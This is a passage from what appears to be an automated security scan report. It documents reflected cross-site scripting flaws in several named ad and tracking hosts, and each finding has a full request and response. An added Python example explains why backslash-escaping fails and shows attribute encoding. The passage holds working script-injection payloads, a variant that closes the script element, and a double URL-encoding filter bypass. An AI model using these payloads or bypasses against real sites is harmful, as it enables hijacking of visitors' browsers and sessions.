Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 01:37:02 GMT
Date: Sat, 17 Sep 2011 01:37:02 GMT
Content-Length: 1261
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"3005693", c3:"17", c4:"http://www.bradsdeals.com", c5:"", c6:"", c10:"66a83<script>alert(1)</script>803fdeef77b", c15:"", c16:"", r:""});

4.67. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload 961ba<script>alert(1)</script>5ef4d07457b was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=&c15=961ba<script>alert(1)</script>5ef4d07457b&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:09 GMT
Date: Sat, 17 Sep 2011 00:52:09 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"961ba<script>alert(1)</script>5ef4d07457b", c16:"", r:""});

4.68. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 3d1ac<script>alert(1)</script>969635bd65a was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=59648883d1ac<script>alert(1)</script>969635bd65a&c3=2&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:03 GMT
Date: Sat, 17 Sep 2011 00:52:03 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"59648883d1ac<script>alert(1)</script>969635bd65a", c3:"2", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.69. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload dcffa<script>alert(1)</script>16a4cf57524 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2dcffa<script>alert(1)</script>16a4cf57524&c4=&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:05 GMT
Date: Sat, 17 Sep 2011 00:52:05 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
y{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2dcffa<script>alert(1)</script>16a4cf57524", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.70. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload d68d4<script>alert(1)</script>a87e6bee52c was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=d68d4<script>alert(1)</script>a87e6bee52c&c5=&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:06 GMT
Date: Sat, 17 Sep 2011 00:52:06 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"d68d4<script>alert(1)</script>a87e6bee52c", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

4.71. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload e7599<script>alert(1)</script>52183d27ea7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=e7599<script>alert(1)</script>52183d27ea7&c6=&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:07 GMT
Date: Sat, 17 Sep 2011 00:52:07 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"e7599<script>alert(1)</script>52183d27ea7", c6:"", c10:"", c15:"", c16:"", r:""});

4.72. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 4342b<script>alert(1)</script>a0dd5801e26 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=7&c2=5964888&c3=2&c4=&c5=&c6=4342b<script>alert(1)</script>a0dd5801e26&c15=&tm=738115 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sat, 01 Oct 2011 00:52:08 GMT
Date: Sat, 17 Sep 2011 00:52:08 GMT
Content-Length: 1235
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"7", c2:"5964888", c3:"2", c4:"", c5:"", c6:"4342b<script>alert(1)</script>a0dd5801e26", c10:"", c15:"", c16:"", r:""});

4.73. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3c73"><script>alert(1)</script>e1b769851e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_ATTf3c73"><script>alert(1)</script>e1b769851e7/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 380
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATTf3c73"><script>alert(1)</script>e1b769851e7/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/2021264515/Bottom3/default/empty.gif/4d686437616b357a2b73594141673869?x" target="_top">
...[SNIP]...

4.74. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 335ab"><script>alert(1)</script>facc901f053 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_ATT/LP335ab"><script>alert(1)</script>facc901f053/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP335ab"><script>alert(1)</script>facc901f053/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/L9/1785929992/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b74514141672b75?x" target="_blank">
...[SNIP]...

4.75. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32bc8"><script>alert(1)</script>895c80335e5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new32bc8"><script>alert(1)</script>895c80335e5/1[timestamp]@Bottom3? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:41:54 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 463
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new32bc8"><script>alert(1)</script>895c80335e5/1[timestamp]/L9/1578951643/Bottom3/USNetwork/TRACK_Default/TRACK_Default_1x1pixel-.gif/4d686437616b357a2b754941424d6f62?x" target="_blank">
...[SNIP]...

4.76. http://b3.mookie1.com/2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom3

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71dff"><script>alert(1)</script>b41d32a101b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]@Bottom371dff"><script>alert(1)</script>b41d32a101b? HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://attuverseoffers.com/tv_hsi_bundles/index.php?sendVar=20State_49PromoOffer&source=ECbc0000000WIP00O&fbid=9Lm6uVSxV_u
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:42:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 372
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_ATT/LP/cntacp_22UverseLPtest_LP_1_new/1[timestamp]/1878794723/Bottom371dff"><script>alert(1)</script>b41d32a101b/default/empty.gif/4d686437616b357a2b764141426c786f?x" target="_top">
...[SNIP]...

4.77. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9bf9</script><script>alert(1)</script>cc94f26ced5 was submitted in the companion parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottomb9bf9</script><script>alert(1)</script>cc94f26ced5&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:40 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2154
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/Rea
...[SNIP]...
ROLLING=no BORDERCOLOR="#000000" '+
'SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_sx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottomb9bf9</script><script>alert(1)</script>cc94f26ced5!Top">
...[SNIP]...

4.78. http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the companion request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 431a4"><script>alert(1)</script>498ee9cb580 was submitted in the companion parameter. This input was echoed as 431a4\"><script>alert(1)</script>498ee9cb580 in the application's response. The backslash inserted before the quote is consistent with PHP's addslashes() or magic_quotes behaviour; HTML attributes have no backslash escape, so the quote still terminates the SRC attribute and the SCRIPT start tag. Note that this particular payload then lands inside the raw text of the SCRIPT element whose SRC it terminated, and a browser ignores the content of a script element that has a SRC, so the injected script runs only once that element is closed first (for example with "></script><script>alert(1)</script>). HTML attribute encoding of the value (&quot; &lt; &gt;) rather than backslash escaping is the correct fix for this context.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom431a4"><script>alert(1)</script>498ee9cb580&page=bh.heraldinteractive.com/news/home HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1141638517-1316021781233

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:36 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
X-Powered-By: PHP/5.2.0-8+etch16
Vary: Accept-Encoding
Content-Length: 2118
Connection: close
Content-Type: text/html


<style type="text/css">
   /* div { top: 0px; } */
</style>


<!--- 1st Section: Delivery Attempt via JX tag. --->
<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/news/home@Top,x14,x15,Middle,Middle1,Middle2,Bottom431a4\"><script>alert(1)</script>498ee9cb580!Top">
...[SNIP]...
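
The following is an added example, not code from the scan or from the site being tested: it uses Python's standard-library HTML parser to show what a browser's tokenizer makes of the backslash-escaped quote in the response above, first with the scanner's payload, then with a payload that closes the SRC-bearing SCRIPT element, and finally with HTML attribute encoding in place of addslashes(). The surrounding tag is reconstructed from the single response line visible above, and the addslashes() behaviour is an assumption about the server, not its actual code.

```python
"""Added example, not part of the scan report: shows with Python's stdlib HTML
parser why the backslash-escaped quote seen in finding 4.78 does not protect
a double-quoted attribute, and what attribute encoding changes."""
import html
from html.parser import HTMLParser

# Values taken from finding 4.78 above. The tag around them is reconstructed
# from the one response line that is visible; the real template is not shown.
SCANNER_PAYLOAD = '431a4"><script>alert(1)</script>498ee9cb580'
CLOSING_PAYLOAD = '431a4"></script><script>alert(1)</script>498ee9cb580'
SLOTS = "Top,x14,x15,Middle,Middle1,Middle2,Bottom"
AD_URL = ("http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/"
          "bh.heraldinteractive.com/news/home@")


def addslashes(s: str) -> str:
    """Mimic PHP addslashes(): a backslash before quotes and backslashes.
    HTML has no backslash escape, so this changes nothing in an attribute.
    (Assumed to be what the server does; its code is not on the page.)"""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def render_vulnerable(companion: str) -> str:
    """What the application appears to do: addslashes(), then interpolate."""
    return ('<SCRIPT LANGUAGE="JavaScript1.1" SRC="' + AD_URL
            + addslashes(companion) + '!Top"></SCRIPT>')


def render_fixed(companion: str) -> str:
    """Context-correct fix: HTML attribute encoding of quotes, < and >."""
    return ('<SCRIPT LANGUAGE="JavaScript1.1" SRC="' + AD_URL
            + html.escape(companion, quote=True) + '!Top"></SCRIPT>')


class ScriptRecorder(HTMLParser):
    """Record every <script> element the tokenizer produces, with its
    attributes and raw text content, the way a browser would see them."""

    def __init__(self):
        super().__init__()
        self.scripts = []        # one dict of attributes per <script> start tag
        self.bodies = []         # raw text inside each script element
        self._inside = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.scripts.append(dict(attrs))
            self.bodies.append("")
            self._inside = True

    def handle_data(self, data):
        if self._inside:
            self.bodies[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._inside = False


def _parse(markup: str) -> ScriptRecorder:
    p = ScriptRecorder()
    p.feed(markup)
    p.close()
    return p


def inline_scripts(markup: str) -> list:
    """Bodies of script elements that have no SRC: the ones a browser would
    execute as inline code. A script element with a SRC ignores its content."""
    p = _parse(markup)
    return [b for s, b in zip(p.scripts, p.bodies) if "src" not in s]


def first_script_src(markup: str) -> str:
    """Where the SRC attribute of the first script element actually ends."""
    return _parse(markup).scripts[0]["src"]
```

With the scanner's payload the SRC value ends at the backslash and the injected tags sit in the ignored body of that external script, so inline_scripts() is empty; with the payload that closes the element first, inline_scripts() returns the injected body alert(1); with html.escape() the whole payload stays inside the attribute value and no second script element exists.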

4.79. http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /includes/processAds.bg

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 was submitted in the page parameter. This input was echoed as 4cfbf';alert(1)//04fb34becb4 in the application's response. The single quote closes the string literal, the semicolon ends the statement and // discards the rest of the line. Because a script block is parsed in full before any of it runs, this exact payload executes only if the statement it truncates is still syntactically valid; the remainder of the block is not shown here, whereas the same double-encoding trick applied to a </script> sequence would not depend on the surrounding JavaScript at all.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of the page request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com/news/home4cfbf%2527%253balert%25281%2529%252f%252f04fb34becb4 HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/mobile/info.bg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
